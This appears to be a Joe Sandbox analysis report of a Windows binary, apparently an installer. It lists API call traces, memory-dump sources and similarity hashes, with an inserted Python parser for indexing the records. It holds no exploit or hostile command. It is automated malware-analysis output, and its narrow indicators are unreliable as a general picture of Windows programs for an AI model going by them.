                                                                                                                                          • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                                          • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                                          • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                                          • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                                          • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                                          • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                                          • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                          • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                                                          • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                                          • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                                          • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                                                          • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                        • String ID: Setup
                                                                                                                                        • API String ID: 504348408-3839654196
                                                                                                                                        • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                        • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                                                        • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                        • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
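The fields a practitioner reuses from records like the one above are the call lists, which show what the binary resolves at run time (the GetModuleHandleA/GetProcAddress chains fetch SetDllDirectoryW, SetSearchPathMode, SetProcessDEPPolicy, Wow64DisableWow64FsRedirection, SHGetKnownFolderPath and others), and the Similarity identifiers (API String ID, Opcode ID, Instruction Fuzzy Hash), which let a function be matched against other samples. One caveat is visible in the records themselves: the arguments are rendered from stack contents at the call site, so a procedure name often shows up in the neighbouring GetModuleHandleA entry while GetProcAddress itself displays a module name (NotifyWinEvent above). The Python below is an added example, not part of this report or of Joe Sandbox's tooling: it parses records in this layout, collects the runtime-resolved names across all loader calls to work around that rendering quirk, and indexes records by any Similarity field. The sample text is constructed from entries on this page and abbreviated; the regular expressions assume the layout exactly as rendered here.

```python
import re
from collections import defaultdict, namedtuple

# Constructed sample: abbreviated records copied from the entries on this page.
# The parser is an added example, not Joe Sandbox's own code.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD), ref: 00450933
• FlushFileBuffers.KERNEL32(?), ref: 0045C499
Strings
• NumRecs range exceeded, xrefs: 0045C396
• EndOffset range exceeded, xrefs: 0045C3CD
Similarity
• API ID: File$BuffersFlush
• String ID: EndOffset range exceeded$NumRecs range exceeded
• API String ID: 3593489403-659731555
• Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
APIs
  • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
  • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
  • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
  • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
• SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
• ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
Similarity
• API ID: AddressProc$HandleModule$Window$Version
• String ID: Setup
• API String ID: 504348408-3839654196
• Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13), ref: 00453A6A
• GetLastError.KERNEL32(00000000,00000000,?), ref: 00453A73
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
• Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})\s*$")
STRING_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+): ?(?P<val>.*)$")
HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LOADER_APIS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
# args: arguments as Joe rendered them ('?' = unknown); ref: call-site address;
# subcall: callee address when the call is attributed to a subroutine, else None
ApiCall = namedtuple("ApiCall", "api module args ref subcall")

def parse_records(text):
    """One dict per 'APIs' block: its calls, its strings and the Similarity fields."""
    records, section, cur = [], None, None
    for line in text.splitlines():
        name = line.strip()
        if name in SECTIONS:
            section = name
            if name == "APIs":  # each record opens with its APIs block
                records.append(cur := {"calls": [], "strings": [], "similarity": {}})
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := CALL_RE.match(line)):
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            cur["calls"].append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur["strings"].append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur["similarity"][m["key"].strip()] = m["val"].strip()
    return records

def call_sites(record):
    """Calls made directly by the function, i.e. not attributed to a subroutine."""
    return [c for c in record["calls"] if c.subcall is None]

def resolved_imports(records):
    """Names handed to the runtime-resolution APIs. Joe prints arguments from the
    stack at the call site, so a procedure name often sits in the adjacent
    GetModuleHandleA/LoadLibraryA entry rather than in GetProcAddress; scan all."""
    names = set()
    for rec in records:
        for c in rec["calls"]:
            if c.api in LOADER_APIS:
                names.update(a for a in c.args if a != "?" and not HEX8_RE.fullmatch(a)
                             and not a.lower().endswith(".dll"))
    return names

def index_by(records, field):
    """Group records by a Similarity field (e.g. 'API String ID') for cross-sample lookup."""
    idx = defaultdict(list)
    for rec in records:
        key = rec["similarity"].get(field)
        if key:
            idx[key].append(rec)
    return dict(idx)
```

Run on the sample, resolved_imports returns SetDllDirectoryW, SetProcessDEPPolicy and NotifyWinEvent; the last of these is only recoverable because the GetModuleHandleA arguments are scanned as well. Indexing by Instruction Fuzzy Hash instead of API String ID gives a key that survives string changes between builds of the same code.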
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID: $=H
                                                                                                                                        • API String ID: 3660427363-3538597426
                                                                                                                                        • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                        • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                                                        • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                        • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID: .tmp
                                                                                                                                        • API String ID: 1375471231-2986845003
                                                                                                                                        • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                        • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                                                        • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                        • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                          • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                          • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                                                        • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                                        • API String ID: 3869789854-2936008475
                                                                                                                                        • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                        • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                                                        • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                        • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                        • API String ID: 3535843008-1113070880
                                                                                                                                        • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                                        • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                                                        • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                                        • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                        • String ID: CreateFile
                                                                                                                                        • API String ID: 2528220319-823142352
                                                                                                                                        • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                                        • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                                                        • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                                        • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open
                                                                                                                                        • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                                                        • API String ID: 71445658-2565060666
                                                                                                                                        • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                                        • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                                                        • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                                        • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                        • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                        • API String ID: 2906209438-2320870614
                                                                                                                                        • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                                        • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                                                        • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                                        • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                        • API String ID: 2492108670-2683653824
                                                                                                                                        • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                        • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                                                        • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                        • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                        • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                                        • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                                                        • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                                        • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
